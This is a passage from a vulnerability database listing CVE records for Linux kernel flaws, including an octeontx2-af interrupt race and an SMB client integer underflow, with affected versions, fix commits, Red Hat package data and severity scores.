"url": "https://git.kernel.org/stable/c/944d5fe50f3f03daacfea16300e656a1691c4a23"
}
],
"title": "sched/membarrier: reduce the ability to hammer on sys_membarrier",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26602",
"datePublished": "2024-02-24T14:56:56.992Z",
"dateReserved": "2024-02-19T14:20:24.128Z",
"dateUpdated": "2025-05-04T08:52:06.429Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27030 (GCVE-0-2024-27030)
Vulnerability from cvelistv5
Published
2024-05-01 12:53
Modified
2025-05-04 09:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
octeontx2-af: Use separate handlers for interrupts
For PF to AF interrupt vector and VF to AF vector same
interrupt handler is registered which is causing race condition.
When two interrupts are raised to two CPUs at same time
then two cores serve same event corrupting the data.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7304ac4567bcb72fd57cc79582bf53ca7840136f Version: 7304ac4567bcb72fd57cc79582bf53ca7840136f Version: 7304ac4567bcb72fd57cc79582bf53ca7840136f Version: 7304ac4567bcb72fd57cc79582bf53ca7840136f Version: 7304ac4567bcb72fd57cc79582bf53ca7840136f Version: 7304ac4567bcb72fd57cc79582bf53ca7840136f Version: 7304ac4567bcb72fd57cc79582bf53ca7840136f Version: 7304ac4567bcb72fd57cc79582bf53ca7840136f |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.937Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/94cb17e5cf3a3c484063abc0ce4b8a2b2e8c1cb2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/766c2627acb2d9d1722cce2e24837044d52d888a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/772f18ded0e240cc1fa2b7020cc640e3e5c32b70"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/29d2550d79a8cbd31e0fbaa5c0e2a2efdc444e44"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dc29dd00705a62c77de75b6d752259b869aac49d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad6759e233db6fcc131055f8e23b4eafbe81053c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4fedae8f9eafa2ac8cdaca58e315f52a7e2a8701"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/50e60de381c342008c0956fd762e1c26408f372c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27030",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:44:21.007612Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:33.167Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/marvell/octeontx2/af/rvu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "94cb17e5cf3a3c484063abc0ce4b8a2b2e8c1cb2",
"status": "affected",
"version": "7304ac4567bcb72fd57cc79582bf53ca7840136f",
"versionType": "git"
},
{
"lessThan": "766c2627acb2d9d1722cce2e24837044d52d888a",
"status": "affected",
"version": "7304ac4567bcb72fd57cc79582bf53ca7840136f",
"versionType": "git"
},
{
"lessThan": "772f18ded0e240cc1fa2b7020cc640e3e5c32b70",
"status": "affected",
"version": "7304ac4567bcb72fd57cc79582bf53ca7840136f",
"versionType": "git"
},
{
"lessThan": "29d2550d79a8cbd31e0fbaa5c0e2a2efdc444e44",
"status": "affected",
"version": "7304ac4567bcb72fd57cc79582bf53ca7840136f",
"versionType": "git"
},
{
"lessThan": "dc29dd00705a62c77de75b6d752259b869aac49d",
"status": "affected",
"version": "7304ac4567bcb72fd57cc79582bf53ca7840136f",
"versionType": "git"
},
{
"lessThan": "ad6759e233db6fcc131055f8e23b4eafbe81053c",
"status": "affected",
"version": "7304ac4567bcb72fd57cc79582bf53ca7840136f",
"versionType": "git"
},
{
"lessThan": "4fedae8f9eafa2ac8cdaca58e315f52a7e2a8701",
"status": "affected",
"version": "7304ac4567bcb72fd57cc79582bf53ca7840136f",
"versionType": "git"
},
{
"lessThan": "50e60de381c342008c0956fd762e1c26408f372c",
"status": "affected",
"version": "7304ac4567bcb72fd57cc79582bf53ca7840136f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/marvell/octeontx2/af/rvu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-af: Use separate handlers for interrupts\n\nFor PF to AF interrupt vector and VF to AF vector same\ninterrupt handler is registered which is causing race condition.\nWhen two interrupts are raised to two CPUs at same time\nthen two cores serve same event corrupting the data."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:02:40.056Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/94cb17e5cf3a3c484063abc0ce4b8a2b2e8c1cb2"
},
{
"url": "https://git.kernel.org/stable/c/766c2627acb2d9d1722cce2e24837044d52d888a"
},
{
"url": "https://git.kernel.org/stable/c/772f18ded0e240cc1fa2b7020cc640e3e5c32b70"
},
{
"url": "https://git.kernel.org/stable/c/29d2550d79a8cbd31e0fbaa5c0e2a2efdc444e44"
},
{
"url": "https://git.kernel.org/stable/c/dc29dd00705a62c77de75b6d752259b869aac49d"
},
{
"url": "https://git.kernel.org/stable/c/ad6759e233db6fcc131055f8e23b4eafbe81053c"
},
{
"url": "https://git.kernel.org/stable/c/4fedae8f9eafa2ac8cdaca58e315f52a7e2a8701"
},
{
"url": "https://git.kernel.org/stable/c/50e60de381c342008c0956fd762e1c26408f372c"
}
],
"title": "octeontx2-af: Use separate handlers for interrupts",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27030",
"datePublished": "2024-05-01T12:53:25.954Z",
"dateReserved": "2024-02-19T14:20:24.211Z",
"dateUpdated": "2025-05-04T09:02:40.056Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-0565 (GCVE-0-2024-0565)
Vulnerability from cvelistv5
Published
2024-01-15 20:02
Modified
2025-11-06 19:54
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-191 - Integer Underflow (Wrap or Wraparound)
Summary
An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.
References
| URL | Tags | ||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
Version: 0 ≤ |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:11:35.146Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:1188",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1188"
},
{
"name": "RHSA-2024:1404",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1404"
},
{
"name": "RHSA-2024:1532",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1532"
},
{
"name": "RHSA-2024:1533",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1533"
},
{
"name": "RHSA-2024:1607",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1607"
},
{
"name": "RHSA-2024:1614",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"name": "RHSA-2024:2093",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"name": "RHSA-2024:2394",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2394"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-0565"
},
{
"name": "RHBZ#2258518",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258518"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240223-0002/"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.spinics.net/lists/stable-commits/msg328851.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-0565",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-08T15:47:13.024655Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-06-03T13:59:38.696Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://git.kernel.org/pub/scm/linux/kernel",
"defaultStatus": "unaffected",
"packageName": "kernel",
"versions": [
{
"lessThan": "6.7-rc6",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::nfv",
"cpe:/a:redhat:enterprise_linux:8::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.24.1.rt7.326.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::crb",
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.24.1.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.95.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:8.8::crb",
"cpe:/o:redhat:rhel_eus:8.8::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-477.51.1.el8_8",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-427.13.1.el9_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-427.13.1.el9_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::crb",
"cpe:/o:redhat:rhel_eus:9.2::baseos",
"cpe:/a:redhat:rhel_eus:9.2::appstream"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.59.1.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::nfv",
"cpe:/a:redhat:rhel_eus:9.2::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.59.1.rt14.344.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.95.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-operator-bundle",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-16",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-rhel8-operator",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch6-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v6.8.1-408",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-operator-bundle",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-19",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-proxy-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.0.0-480",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-rhel8-operator",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/eventrouter-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.4.0-248",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/fluentd-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.14.6-215",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/kibana6-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v6.8.1-431",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/log-file-metric-exporter-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.1.0-228",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-curator5-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.1-471",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-loki-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v2.9.6-15",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-view-plugin-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-operator-bundle",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-27",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-rhel8-operator",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-12",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/lokistack-gateway-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-527",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/opa-openshift-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-225",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/vector-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.28.1-57",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2023-12-18T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-191",
"description": "Integer Underflow (Wrap or Wraparound)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-06T19:54:35.381Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:1188",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1188"
},
{
"name": "RHSA-2024:1404",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1404"
},
{
"name": "RHSA-2024:1532",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1532"
},
{
"name": "RHSA-2024:1533",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1533"
},
{
"name": "RHSA-2024:1607",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1607"
},
{
"name": "RHSA-2024:1614",
"tags": [
"vendor-advisory",
